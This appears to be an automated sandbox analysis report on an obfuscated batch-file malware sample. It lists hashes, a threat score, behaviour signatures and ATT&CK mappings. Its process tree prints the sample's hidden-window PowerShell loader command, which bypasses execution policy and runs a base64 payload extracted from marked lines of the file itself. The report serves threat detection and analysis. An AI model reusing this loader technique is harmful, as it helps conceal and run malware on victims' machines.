0c17eb3ab5d7fdff6fcde1fee32a4183ec0928aa7ae77a74b140a128ed671b84

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07/03/2025, 22:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient_encrypted_obf_bat.bat
Size

540KB
MD5

7691f0a3619e34794c2d9f8acd645e30
SHA1

666541b63a9f6b808765e45b1238a2935b3be7a8
SHA256

0c17eb3ab5d7fdff6fcde1fee32a4183ec0928aa7ae77a74b140a128ed671b84
SHA512

76750941a254405f4477f989315db2ba5507dc8a6bb6c1091b4f0510a884e637337d18d27910766b88ae1038a1dd36f2ecbddc504e8b6220522cc509fde9038e
SSDEEP

6144:qOaa4GFhnfN27m5lxsVjLLWHKTkrQk5zb9zRvphlQ0/vxiwEilMwDEh9HwOf6Lnr:QY7215Wbb9BXf7/BV7v

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2164	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2164	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2164	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2164	2168	cmd.exe	31
PID 2168 wrote to memory of 2164	2168	cmd.exe	31
PID 2168 wrote to memory of 2164	2168	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\XClient_encrypted_obf_bat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -WindowStyle Hidden -C "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((Get-Content 'C:\Users\Admin\AppData\Local\Temp\XClient_encrypted_obf_bat.bat' -raw | Select-String (':' + ':KDOT::(.*)')).Matches.Groups[1].Value)))"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2164-4-0x000007FEF579E000-0x000007FEF579F000-memory.dmp

Filesize
4KB

Download
memory/2164-7-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download
memory/2164-6-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2164-8-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download
memory/2164-5-0x000000001B530000-0x000000001B812000-memory.dmp

Filesize
2.9MB

Download
memory/2164-11-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download
memory/2164-10-0x0000000002A2B000-0x0000000002A92000-memory.dmp

Filesize
412KB

Download
memory/2164-9-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

Filesize
9.6MB

Download